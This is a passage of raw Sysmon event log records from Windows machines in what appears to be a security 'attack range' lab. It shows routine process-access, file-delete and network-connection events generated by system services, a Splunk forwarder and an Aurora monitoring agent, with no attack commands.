m32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.095{FE4C2B44-DDF7-63C7-B404-00000000AF02}27286336C:\Windows\system32\sihost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.079{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.079{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000046824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.079{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 23542300x800000000000000046855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:09.988{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F39FD48A96A6A94D05D792729AFC1779,SHA256=812B43E46E4371EF68B1BB65486D229757BAF4A8380F193B11BEFC2DF9179906,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:09.984{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BE2E3B54E7A5C49F43969EB9CCDCBE0,SHA256=9237B13AEF054E10E3359054B35BB40C21B58F3D02F2FAC337EBB3D534863099,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018716Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:09.036{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE87E4AE7ABC30987F31EBB42E92D38B,SHA256=74E39445FC30A355950FA8485933CA23FB9994DDCC71D07869D9D497A02EA13C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:09.439{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:09.439{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:09.439{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000046850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:09.000{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE89FA92FAE312A40A194C605D152558,SHA256=1D9FB4E5A8088EED8640C872835EEE4AA7B80E823C3A9602887D23C5237C68BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018718Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:08.135{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50192-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:10.114{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1040209EF831A25E88BFED21978D0A3,SHA256=5858685E9D0A33A0884FFDA00F05E1A75C9DDC27A9A439455A46278B38FACF86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.982{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.982{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.982{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.981{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.981{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.981{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.970{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.970{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.970{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader 